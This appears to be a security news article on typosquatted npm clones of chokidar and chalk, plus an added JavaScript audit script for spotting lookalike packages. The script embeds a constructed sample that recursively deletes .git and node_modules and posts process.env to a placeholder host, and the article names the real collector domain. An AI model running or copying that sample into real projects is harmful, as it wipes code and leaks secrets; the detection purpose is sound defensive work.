A recent report by researchers at Socket reveals a concerning supply chain attack targeting popular Node.js libraries, chokidar and chalk, via typosquatting. The attacker, identified as “davn118,” created malicious clones of these trusted tools, embedding destructive logic and data exfiltration routines to compromise developers’ projects.
Chokidar and chalk are essential Node.js libraries:
- Chokidar serves as a file-watching library with 56 million weekly downloads.
- Chalk is used for terminal string styling, boasting over 265 million downloads per week.
However, the malicious packages—named cschokidar-next and achalk-next—hide destructive capabilities under the guise of “minimal and efficient” alternatives. According to the report, “The attacker copies the entire legitimate code for each library, then tacks on destructive and exfiltrating logic at the bottom. Notably, each fake package reuses a similar README as the authentic library.”
How the Trojan Libraries Work
- File Destruction with “thanks()”: Both clones use a recursive file-deletion function named thanks(). For chokidar variants, the function triggers based on specific environmental conditions. When the NODE_ENV variable does not equal “development,” the script deletes critical directories like .git, .vscode, src, and node_modules. “The script removes not only .vscode and .package.json but also a broader set of folders if the key is invalid: ./library, ./mock, ./public, and more.”
- Data Exfiltration in Chalk Clones: Unlike chokidar, the chalk clones steal environment variables, such as VUE_APP_SECRET_KEY and VUE_GITHUB_USER_NAME, and send them to a remote server (yc.cnzzsoft[.]com). “If the server responds with data.code == 202, the code calls thanks() on directories like ./.git and ./node_modules, effectively letting the attacker decide whether to nuke your project.”
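As an added example (not code from Socket's report or from the malicious packages), the following dependency audit turns the two behaviours described above into a triage check: it flags dependency names that wrap a trusted name in extra characters, the way cschokidar-next and achalk-next wrap chokidar and chalk, and it scans package source for recursive deletion of the directories named in the report combined with process.env being sent over the network. The sample source it runs over is constructed to mirror the report's description, and the collector hostname in it is a placeholder.

```javascript
// Added example, not the page's or Socket's own tooling.
const TRUSTED = ['chokidar', 'chalk'];
// Directories the report says the clones delete; treated as high-risk targets.
const SENSITIVE_DIRS = ['.git', '.vscode', 'src', 'node_modules', 'public', 'mock', 'library'];

// Flag dependency names that contain a trusted name but are not equal to it,
// e.g. "cschokidar-next" or "achalk-next". Hits need manual review: a legitimate
// companion package (a "-template" or "-types" suffix) will also match.
function findLookalikes(deps, trusted = TRUSTED) {
  const hits = [];
  for (const name of Object.keys(deps)) {
    const bare = name.replace(/^@[^/]+\//, '').toLowerCase(); // drop npm scope
    for (const t of trusted) {
      if (bare !== t && bare.includes(t)) hits.push({ name, lookalike: t });
    }
  }
  return hits;
}

// Static triage of a package's source text. Three rules, each matching one
// trait the report describes: deletion of a sensitive directory, process.env
// handed to a network call, and an environment-variable gate on NODE_ENV.
function scanSource(code) {
  const findings = [];
  const deletes = /\b(rmSync|rm|rmdirSync|rmdir|unlinkSync|unlink)\s*\(/;
  const dirs = SENSITIVE_DIRS.filter(d =>
    code.includes(`./${d}`) || code.includes(`'${d}'`) || code.includes(`"${d}"`));
  if (deletes.test(code) && dirs.length) findings.push({ rule: 'recursive-delete', dirs });
  const network = /\b(fetch|axios|http\.request|https\.request|request)\s*\(/;
  if (network.test(code) && /process\.env/.test(code)) findings.push({ rule: 'env-exfil' });
  if (/NODE_ENV\s*!==?\s*['"]development['"]/.test(code)) findings.push({ rule: 'env-gated' });
  return findings;
}

// Constructed sample shaped like the report's description (not the real malware);
// the hostname is a placeholder, not an indicator from the report.
const SAMPLE = `
const fs = require('fs');
function thanks(p) { fs.rmSync(p, { recursive: true, force: true }); }
if (process.env.NODE_ENV !== 'development') { thanks('./.git'); thanks('./node_modules'); }
fetch('https://COLLECTOR-PLACEHOLDER.invalid/', { method: 'POST', body: JSON.stringify(process.env) });
`;

console.log(findLookalikes({ chalk: '^5', 'achalk-next': '^1', 'cschokidar-next': '^1' }));
console.log(scanSource(SAMPLE));
```

Run it against a real package.json's dependencies and each dependency's entry file; anything flagged by more than one rule deserves a manual read before the package is installed in CI.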
The legitimate libraries are widely used in development pipelines, making their clones a potent threat. “By hijacking chokidar and chalk, the attacker davn118 transformed trusted developer tools into Trojan horses, poised to wipe your system or harvest your secrets at the slightest mismatch in environment variables,” Socket emphasizes.
For detailed insights, visit Socket’s official report. Stay proactive and secure your dependencies!